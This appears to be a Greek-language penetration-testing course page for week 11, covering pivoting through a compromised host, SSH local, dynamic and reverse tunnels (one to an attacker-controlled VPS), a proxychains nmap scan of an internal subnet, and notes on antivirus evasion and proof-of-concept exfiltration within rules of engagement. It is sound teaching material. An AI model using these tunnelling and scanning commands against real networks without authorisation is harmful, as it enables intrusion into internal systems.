Skip to main content

Εβδομάδα 11 — Πλευρικές μετακινήσεις και εξαγωγή δεδομένων

Παιδαγωγικοί στόχοι​

  • Χρήση ενός παραβιασμένου κεντρικού υπολογιστή ως pivot προς ένα εσωτερικό τμήμα δικτύου.
  • Δημιουργία σταθερών, αναστρέψιμων, καταγράψιμων σηράγγων SSH.
  • Κατανόηση της αποφυγής antivirus χωρίς να γίνεται αυτοσκοπός.

Το pivot σε μία φράση​

Ένα pivot μετατρέπει τον παραβιασμένο κεντρικό υπολογιστή σε αναμεταδότη. Χωρίς pivot, η εσωτερική αναγνώριση είναι αδύνατη από τα έξω.

Τρεις τεχνικές σήραγγας​

# Τοπική ανακατεύθυνση: ο σταθμός του επιτιθέμενου εκθέτει μια θύρα που φτάνει σε μια εσωτερική υπηρεσία.
ssh -L 8080:10.1.1.20:80 utilisateur@pivot

# Δυναμική ανακατεύθυνση: SOCKS5 στην πλευρά του επιτιθέμενου, όλη η κίνηση βγαίνει από το pivot.
ssh -D 1080 utilisateur@pivot

# Αντίστροφη ανακατεύθυνση: ο στόχος συνδέεται προς εσάς. Χρήσιμο πίσω από NAT.
ssh -R 4444:localhost:22 attaquant@vps

Χρήση με Proxychains:

# /etc/proxychains.conf
socks5 127.0.0.1 1080
proxychains -q nmap -sT -Pn 10.1.1.0/24

Υπεύθυνη εσωτερική αναγνώριση​

Σε ένα εσωτερικό δίκτυο, μια επιθετική σάρωση διακόπτει υπηρεσίες (εκτυπωτές, αυτόματα). Κατεβάστε σε -T2, περιοριστείτε στις θύρες που είναι σχετικές με τον στόχο, ποτέ μη σαρώνετε ολόκληρο ένα βιομηχανικό τμήμα δικτύου χωρίς ρητή εξουσιοδότηση στο RoE.

Αποφυγή antivirus — Τι πρέπει να γνωρίζετε​

Η αποφυγή είναι ένα πεδίο που μεταβάλλεται συνεχώς. Αυτό που μετράει σε επαγγελματικό pentest:

  • Τεκμηρίωση των τεχνικών που δοκιμάστηκαν: η αξία για τον πελάτη είναι να γνωρίζει τι εντοπίστηκε, όχι μόνο τι λειτούργησε.
  • Μην αφήνετε μόνιμο φορτίο χωρίς ρητή εξουσιοδότηση: αυτό είναι μια σχεδόν πάντα κόκκινη γραμμή του RoE.
  • Καθαρισμός κάθε κεντρικού υπολογιστή στο τέλος ενός τεστ: αρχεία, λογαριασμοί, προγραμματισμένες εργασίες.

Εξαγωγή δεδομένων​

Ο κανόνας: εξαγωγή ψεύτικων δεδομένων για την απόδειξη του καναλιού, ποτέ πραγματικών δεδομένων του πελάτη. Ένα κρυπτογραφημένο και χρονοσημασμένο αρχείο PROOF_OF_EXFIL_2026-08-08.txt αρκεί για την επίδειξη.